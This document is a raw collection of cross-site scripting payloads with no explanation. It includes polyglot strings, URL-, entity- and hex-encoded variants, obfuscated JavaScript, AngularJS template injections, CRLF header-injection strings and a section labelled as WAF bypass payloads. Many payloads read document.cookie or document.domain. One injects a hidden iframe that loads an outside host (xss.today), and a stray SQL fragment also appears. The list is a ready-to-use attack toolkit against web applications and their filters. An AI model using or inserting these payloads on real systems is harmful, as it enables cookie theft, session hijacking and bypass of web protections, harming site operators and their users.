jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

\x3csVg/\x3e">

\x3csVg/\x3e'>

\x3csVg/\x3e>

 

click me

click me

 

<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e';

var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e";

String.raw`jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e`;

var re = /jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e/;

//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

/*jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e*/

 

//\x3csVg/\x3e

javascript:"/*'/*`/*-->

javascript:"/*'//`//\"///<i

javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"><svg/oNloAd=alert()>\";alert()//

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

'''jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk={callback} )//%0D%0A%0d%0a//\x3csVg/\x3e''',

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

” *

@im\port'\ja\vasc\ript:alert("XSS")';

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

avascript:/*"/*'/*\"/*`/*><alert()<\ /**/alert()//

javascript:'/*`/*'/*"/*\"/*//

javascript:new%20Function`al\ert\`1\``;

javascript:"/*\"/*'/*`/*--><

javascript:"/*'/*`/*-->

javascript:"/*'/*`/*-->

#jaVasCript:/*-/*/*\/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e

#jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\\x3csVg/\\x3e

<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e-->

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e

jaVasCript:\/*-\/*`\/*\\`\/*\'\/*\"\/**\/(\/* *\/oNcliCk=alert() )\/\/%0D%0A%0D%0A\/\/<\/stYle\/<\/titLe\/<\/teXtarEa\/<\/scRipt\/--!>\\x3csVg\/\\x3e

jaVasCript:\\\/*-\\\/*`\\\/*\\\\`\\\/*\\\'\\\/*\\\"\\\/**\\\/(\\\/* *\\\/oNcliCk=alert() )\\\/\\\/%0D%0A%0D%0A\\\/\\\/<\\\/stYle\\\/<\\\/titLe\\\/<\\\/teXtarEa\\\/<\\\/scRipt\\\/--!>\\\\x3csVg\\\/\\\\x3e

jaVasCript:\\\\\\\/*-\\\\\\\/*`\\\\\\\/*\\\\\\\\`\\\\\\\/*\\\\\\\'\\\\\\\/*\\\\\\\"\\\\\\\/**\\\\\\\/(\\\\\\\/* *\\\\\\\/oNcliCk=alert() )\\\\\\\/\\\\\\\/%0D%0A%0D%0A\\\\\\\/\\\\\\\/<\\\\\\\/stYle\\\\\\\/<\\\\\\\/titLe\\\\\\\/<\\\\\\\/teXtarEa\\\\\\\/<\\\\\\\/scRipt\\\\\\\/--!>\\\\\\\\x3csVg\\\\\\\/\\\\\\\\x3e

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e

jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//

javascript:"/*'/*`/*-->

javascript:"/*'/*`/*\" /*

javascript:"/*\"/*`/*' /*-->

javascript:`//"//\"//`

javascript:`/*\"/*-->`

javascript:"/*'//`//\"///

javascript:"/*`/*\"/*'/*/*

javascript:`\"///"//</`

javascript:`\"///"//</`

javascript:/*`//'//\"//-->/

javascript:/*"//'//`//\"//-->//

javascript:/*-->'//"//`//\"///*

javascript:/*"/*'/*`/*\"/*-->/*

javascript:/*"/*'/*\"/*`/*-->//

javascript:/*"/*`/*'/*\"/*--> /*

javascript:"/*'//`//\"//--><alert()<

javascript:alert()"//\"//'//`//-->//

javascript:/*"/*`/*'/*\"/*<

javascript:"/*`/*\"/*' /*<

javascript:/*-->\"[`["[']<///

javascript:"/*\"/*'/*`/*--><

javascript:/*"/*`/*'/*\"/*-->< /**/alert()//<

javascript:"/*\"/*'/*--></*` /*<

javascript:"/*'/*\"/*` /**/alert()//-->alert()

javascript:/*"/*`/*'/*\"/*-->*/ alert()//<

javascript:`/*javascript:/*`/*\"/*'/*"/*<

javascript:alert()//"/*`/*'/*\"/*-->*/ alert()//<alert()<

javascript:alert()//'//"//\"//-->`//*/ alert();//<

javascript:/*"/*\"/*`/*'/**/ (alert())//<

javascript:/*"/*'/*\"/*`/*><alert()<\ /**/alert()//

javascript:/*`/*'/*'/*"-/*\"/**/ alert()//>--><

javascript:'/*`/*'/*"/*\"/*//

javascript:alert()//-->*///\"//`//'//"//> alert()//

javascript:alert()//'//"//\"; '/`/*\/*'/*"/**/(alert())//-->alert()

javascript:/*"/*'/*`/*\"/**/ alert()//*--><

javascript:alert()//\"//`//'//"//-->">*/ alert()//

javascript:alert()//*-->*`/*'/*"/*\"/*/**/ alert()//

jaVasCript:/*`/*\`/*'/*\"//"/**/(onload=alert())//

javascript:alert()//'//"//`//>--><\">alert()//*/ alert()//

javascript:alert()//\ /*-->alert`;alert();`*/alert()//\";alert()//

javascript:alert/*`/*\/*'/*\"/*"/**/(alert())// alert()//-->alert()

javascript:alert();//\" alert();/*`/**/(/**/alert())//alert()<>

javascript:alert()//*/alert()/*'-/"/-eval(`(alert())`)//\"-alert()//-->alert() alert()//

javascript:alert()//\";alert();/*-/*`/*\`/*'/*"/**///--> alert(1)//

javascript:alert()//`;alert()`';alert()//\";alert();//"//-->*/ alert()//*

javascript:alert()//alert()-->\";alert()//";alert()//';alert()//alert()` alert()//*/alert()/*

javascript:alert();//\";alert();//";alert();//';alert();//`;alert();// alert();//*/alert();//--><!--

javascript:/*-->">">alert()+\"; alert()//

javascript:alert(1)//\";alert(1);<!--jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//-->alert(1) alert(1)//

WAF Bypass payloads by coffinxp:

 

">"@yourdomain

013371337;ext=

  

"@gmail.com

  

<””>

 

%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e

%3Csvg%20onload=alert(%22MrHex88%22)%3E

'">

">\]

%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E

">

'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o

javascript:var a="ale";var b="rt";var c="()";decodeURI("Click meHvita")

ClickMe

window.valueOf=alert;window%2B1

#javascript:alert(1)

  

">XSS here<!--

1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=

1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=

"><+=()>

- 1'"();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")

'"><img src=x onerror=alert("xss!")>.pdf

  

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

"><track/onerror='confirm`1`'>

%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E

<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">

<video><source onerror="alert.constructor.constructor('return this')().alert('‏0f')">

<a href="#" id="uniqueLink">Click me</a> <script> (function() { var a = ['\x6F\x70\x65\x6E', '\x77\x72\x69\x74\x65', '\x63\x6C\x6F\x73\x65', '\x70\x72\x69\x6E\x74', '\x61\x6C\x65\x72\x74']; var b = ['@', 'h', 'x', 'l', 'x', 'm', 'j']; var c = ['B', '1', 'P', '4', '$', '$']; document.getElementById('uniqueLink').onclick = function() { var w = window[a[0]](); w.document[a[1]](b.join('')); w.document[a[2]](); w[a[3]](); window[a[4]](c.join('')); }; })(); </script>

<sCrIpT>(function(){var a=[97,108,101,114,116];var

b=String.fromCharCode.apply(null,a);var c=[88,115,112,108,111,105,116];var d=String.fromCharCode.apply(null,c);window[b](d);})()</sCrIpT>

<DiV sTylE="WidTH:100&#37;;HeIgHt:100vH&#59;" oNpOINteROvEr="var _0x1abc=['\x63','\x6F','\x6E','\x73','\x74','\x72','\x75','\x63','\x74','\x6F','\x72'];var _0x2bcd=['\x61','\x6C','\x65','\x72','\x74','\x28','\x64','\x6F','\x63','\x75','\x6D','\x65','\x6E','\x74','\x2E','\x64','\x6F','\x6D','\x61','\x69','\x6E','\x29'];[][_0x1abc.join('')][_0x1abc.join('')](_0x2bcd.join(''))((97^0)===97?1:0);"></dIV>

<div style="width:100%;height:100vh;" onpointerover="[][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')](decodeURIComponent('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))()"> </div>

<div onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>

<div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div>

<svg onload=(function(){let arr=[41,49,40,116,114,101,108,97].reverse().map(e=>String.fromCharCode(e));let func=new Function(...arr);func();})()>

<svg onload="alert(1)"></svg>

jaVasCript:/*-/*`/*\`/*'/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/(/*%252f%252a*/*&#x252f;&#x252a;prompt(1)&#x252f;&#x253b;/**/;eval(atob('YWxlcnQoIkhpISIp'))//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/)//

<select><noembed></select><script x='a@b'a> y='a@b'//a@b%0a\u0061lert('CYBERTIX')</script x>

  

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

 

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>

<math><x xlink:href=javascript:confirm`1`>click

<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

<svg onload=alert&#0000000040document.cookie)>

JavaScript://%250Aalert?.(1)//

'/*\'/*"/*"/*`/*\`/*%26apos;)/*<!-->

 

k

 

javascript:%ef%bb%bfalert(XSS)

  

">

"><track/onerror='confirm\%601\%60'>

 

"`'>\xE2\x80\x87javascript:alert(1)

 

"`'>\xE2\x80\x87javascript:alert(1)

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

"\/>

"><track/onerror='confirm\%601\%60'>

 

#(1)

 

#(1)

 

"'`//>

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

location=%27javasCript:alert\x281\x29%27

';k='e'%0Atop['al'+k+'rt'](1)//

"';k='e'%0Atop['al'+k+'rt'](1)//"

    

'"/>alert(document.domain)<%2fscript>.css

">

/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)

login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain

'>

{{$el.innerHTML='\u003cimg src onerror=alert(1)\u003e'}}

{{$emit.constructor`alert(1)`()}}

{{$eval.constructor('alert(1)')()}}

{{$on.constructor('alert(1)')()}}

{{$on.constructor('alert("CodePrefer")')()}}

$("script(2)")

$ prompt(1)alert(1)

'-alert(1)-'

'<00 foo="XSS-CLick00>--%20/

<[%00]img onerror=alert(1) src=a>

%00">alert(1);

%00alert(1)

///%01javascript:alert(document.cookie)/

%09Jav%09ascript:alert(document.domain)

/%09/javascript:alert(1)

/%09/javascript:alert(1);

%0A%0d+select+user+from+dual+%0A%0D

%'});%0aalert(1);%20//

{{0[a='constructor'][a]('alert(1)')()}}

%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)

%0Ajavascript%3Ato%0ap%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%0A/%0A/%0A

0\"autofocus/onfocus=alert(1)-->"-confirm(3)-"

%0D%0A%0D%0A%3Cscript%3E%0D%0A%20alert(1);%0D%0A%3C/script%3E%0D%0A

%0d%0a%0d%0aalert(document.domain)

">%0D%0A%0D%0A

">%0D%0A%0D%0A

>%0D%0A%0D%0A

%0d%0a%20

%0d%0a%20

%0d%0a%20

%0d%0a%20">

%0d%0a%20">

%0d%0a%20javascript:alert(1)

%0d%0a%20alert(1)

%0d%0a%20prompt(document.domain)

%0d%0a%20">

%0d%0aX-XSS-Protection:0%0d%0aContent-Type:%20text/html%0d%0a%0d%0a%3Chtml%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3C%21--

<!--*/!'*/!>%0D<svg/onload=confirm'1'//

_0x68087f:alert(0x1);

0xd3adc0de&lt;ScRiPt&gt;alert('XSS Success!')&lt;/sCripT&gt;

0xd3adc0de<ScRiPt>alert('XSS Success!')</sCripT>

')}, 1000); alert('xss')://

')}, 1000);alert("xss");//

10</option></select><img/src=xon=()onx+honerror=alert(1)>ss<svg/onload=prompt(document.domain)%20>

11111';\u006F\u006E\u0065rror=\u0063onfirm; throw'1

1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=

123456%22/%3E%3Cmath%3E%3Carchy%20href=Ja%26Tab;vascript%26colon;console.error(1)%3EARCHY%3C/archy%3E%3C/math%3E%3C!--

123')});alert(1);(()=>{('

12&<script>alert(123)</script>=123

1337 '><marquee onstart="[cookie].find(confirm)">

&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}

1"><%3Csvg onload=alert%28document.cookie%29>'

[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)()

";[][“\146\151\154\164\145\162”][“\143\157\156\163\164\162\165\143\164\157\162”](“\145\166\141\154\50\141\164\157\142\50\42\131\127\170\154\143\156\121\157\115\123\153\75\42\51\51”)();var+test="

¼script¾alert(¢XSS¢)¼/script¾

1&a%2522%253e%253cscript%253ealert%2528/xss/%2529%253c%252fscript%253e

1'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>

1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>

'1/-alert\5023\51/';

1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;>

[1].find(alert)

[1].find(confirm)

1'"><img/src/onerror=.1|alert``>

[1].map(alert) or (alert)(1)

#1&"><script>alert(1)</script>=1

1&"><script>alert(1)</script>=1

1"-->

1

1')"<!--><Svg OnLoad=(confirm)(1)<!--

1'"();<test><iframe onload="window.alert('XSS_WAF_BYPASS')"></iframe>

1'"();<test><ScRiPt>alert("XSS_WAF_BYPASS")</ScRiPt>

1'"();<test><ScRiPt>window.alert("XSS_WAF_BYPASS")</ScRiPt>

1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1

%20%3Cimg%20src=1%20onerror=alert(1)%3E

%20<body onload=alert("bingo")>

/";%20confirm(1);%20//

%20<img src=1 onerror=alert(1)>

%20<img/src/onerror=alert(coffinxp`)>

%20"><img src=q onerror=alert(1)>

%20"><img src=x onerror=prompt(document.domain);>

%20javascript:alert(1)

%20<script>alert(1)</script>

%20<script>prompt(document.domain)</script>

%20"><svg onload=alert(1)>

%22%20autofocus%20onfocus%00%3d(confirm)(1)%2f%2f

%22%2525%2F%28%29%2C%20alert%281%29%3B%27%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E%3Cscript%3E

%22%27%3E'><script>alert(2);</script>

%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--

%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/Yetixx%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fYetixx%2f%29%3C%21--

%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e

%22%3e%3c%5K/onwheel=alert(1)%3emouse%20wheel%20here%3c%21--

%22%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E

%22%3E%3Cd3v%2Fonauxclick%3D%5B2%5D.some%28confirm%29%3Eclick

%22%3E%3Cimg%09src%3Dx%09onerror%3Dprompt(document.domain);%3E

%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3B%3E

%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(%22XSS%22)%3E

#%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E

%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.cookie%29%3B%3E

%22%3E%3Cimg%20src=x%20onerror=confirm%281%29;%3E

%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain);%3E

%22%3E%3Cimg/src=x/onerro=6%3E%3Cimg/src=%221%22/onerror=alert(1);%3E1

%22%3E%3Cli%20style=list-style:url()%20onerror=javascript:alert(1)%3E%20%3Cdiv%20sty

%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E

%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

%22%3E%3Csvg%20onload%3Dalert%26amp%3B%26amp%3B%23x00000040%221%22%29%3E

%22%3E%3Csvg%20onmouseover%3d%22confirm%26%230000000040document.domain)

%22%3EEnter_Mouse_Pointer_Here_to_get_XSS%3C%5K/onpointerenter=alert(location)%3E%3!

%22%3E'><script>alert(2);</script>

%22-[9].every(alert)-%22//

%22-alert('XSS')-%22

%22})))}catch(e){alert(document.domain);}//

%22-confirm(1)-%22

%22onauxclick=alert`xss`+a

%22onmouseover=window[%27al%27%2B%27er%27%2B([%27t%27,%27b%27,%27c%27][0])](document[%27cooki%27%2B(['e','c','z'][0])]);%22

23;%0adocument.body.innerHTML=location.hash;//#<svg/onload=alert(23)>

~2; "%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E"

%2500%27onmouseover=%27window.stop();alert(document.domain)%27

//%250Aalert?.(1)//

%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dprompt%2528document.cookie%2529%253B%253E

%2522%253E%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

%2522%3E%3C%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E

%25253Cscript%25253Ealert('XSS')%25253C%252Fscript%25253E

%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520

%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527

%2527%2520onmouseover%253D%2527alert%25281%2529%2527%2520

/%2527)%253B%2520alert(document.cookies)%253B%252F%252F

%2527%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E

%252F%252F%252A%253E%253CScRipt%253Ealert%2528%252FXSS%252F%2529%253C%252FScriPT%253E

%253C%252Fscript%253E%253Cscript%253Ealert%2528%2527XSS%2520here%2521%2527%2529%253C%252Fscript%253E

%253C%2531%2533%2533%253E%253C%2539%253E%253C%2569%253D%2538%253B%253E%253C%253F%256A%2532%253E%253C%252F%2563%253E%253C%252F%2573%2563%2568%2572%2569%2570%2574%253E

%253cimg%20onerror=alert(1)%20src=a%253e

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

%253Cimg%2520src%253Dx%2520onerror%253Dalert%2528%2529%253E

%253cscript%253ealert(1)%253c/script%253e

%253Cscript%253Ealert(1)%253C/script%253E

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

%253Cscript%253Ealert('XSS')%253C/script%253E

%253Csvg%2520o%256Enoad%253Dalert%25281%2529%253E

%26%2302java%26%23115cript:alert(document.domain)

%26%23x2f%3B%26%23x2f%3Br4y.pw

#'%26%26'javascript:alert%25281%2529//

'%26%26'javascript:alert%25281%2529//

%26amp%3Blt%3Bscript%26amp%3Bgt%3Balert%281%29%26amp%3Blt%3B%2Fscript%26amp%3Bgt%3B

%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3B

%26#x6c;t;\\x73cript&#62;\\u0061lert(1)%26#x6c;t;/\\x73cript&#62;

%27%09);%0d%0a%09%09[1].find(alert)//

%27;%0d%0d});%0d{onerror=prompt}throw document.location</ScRipT//

%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

'%27%3E%27%22%3E%3Cscript%3Ealert(2);%3C/script%3E'

%27%3E%27%3E%22%3E%script%3Ealert(2);%3C/script%3E

%27%3E'><script>alert(2);</script>

%27x%27onclick=%27alert(1)

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F

%2f%2a%2a%2f%75%6e%69%6f%6e%2f%2a%2a%2f%73%65%6c%65%63%74

%2F%2F%2A%3E%3CScRipt%3Ealert%28%2FXSS%2F%29%3C%2FScriPT%3E

"%2F><%2Fscript><script>alert%28document.cookie%29<%2Fscript>

%2sscript%2ualert()%2s/script%2u

&#34;&#62;<h1/onmouseover='\u0061lert(1)'>

&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00

&#34;&#62;<h1/onmouseover='\u0061lert(/AmoloHT/)'>

&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;

#&#39;-alert(1)-&#39;

&#39;-alert(1)-&#39;

"%3balert`1`%3b"

%3balert`1`%3b

%3C%25%69%6D%67%20%73%72%63%3D%78%20%6F%6E%65%72%72%6F%72%3D%70%72%6F%6D%70%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29%3B%3E

%3C%2Fscript%3E%3Cscript%3Econfirm%28document.domain%29%3C%2Fscript%3E

%3C%5K/onpointerenter=alert(1)>

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%7

#%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e

%3Cbody%20onload%3D%60alert%28%2FXSS%2F%29%60%3E%3C%2Fbody%3E

%3Cbody%20onload%3D%60alert%28%60XSS%60%29%60%3E

%3Cbutton%20onclick%3D%60alert%28%2FXSS%2F%29%60%3EClick%20me%3C%2Fbutton%3E

%3Cbutton%20onclick%3D%60alert%28%60XSS%60%29%60%3EClick%3C%2Fbutton%3E

%3Cdiv%20style%3D%22width%3A%20expression%28alert%28%2FXSS%2F%29%29%3B%22%3E%3C%2Fdiv%3E

%3Cembed%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E

%3Cform%20action%3D%22javascript%3Aalert%28%2FXSS%2F%29%22%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E

%3Cform%20action%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3Cinput%20type%3Dsubmit%3E%3C%2Fform%3E

%3Chtml%0aonmouseOver%0a=%0a(prompt)``//

%3Ciframe%20src%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fiframe%3E

"/>%3ciframe%20src%3djavascript%3aalert%283%29%3e

%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%2FXSS%2F%29%3B%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E

%3Ciframe%20srcdoc%3D%60%3Cscript%3Ealert%28%60XSS%60%29%3C%2Fscript%3E%60%3E%3C%2Fiframe%3E

%3Cimg%20src%3D1%20onerror%3Dalert%281%29%3E

%3Cimg%20src%3Dx%20onerror%3D%60alert%28%2FXSS%2F%29%60%3E

%3Cimg%20src%3Dx%20onerror%3D%60alert%28%60XSS%60%29%60%3E

%3Cimg%20src=x%20onerror=alert(1)%3E

%3Cimg%20src=xx%20onerror=alert(1)%3E

%3cimg onerror=alert(1) src=a%3e

%3Cimg src='null' onerror=alert('spyerror')%3E

%3Cinput%20onfocus%3D%60alert%28%60XSS%60%29%60%3E

%3Cinput%20type%3D%22text%22%20value%3D%22%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E%22%3E

%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+

%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Djavascript%3Aalert%28%2FXSS%2F%29%22%3E

%3Cobject%20data%3D%60javascript%3Aalert%28%60XSS%60%29%60%3E%3C%2Fobject%3E

%3Cscript%0Baaa%3Ealert%281%29%3C/script%3E

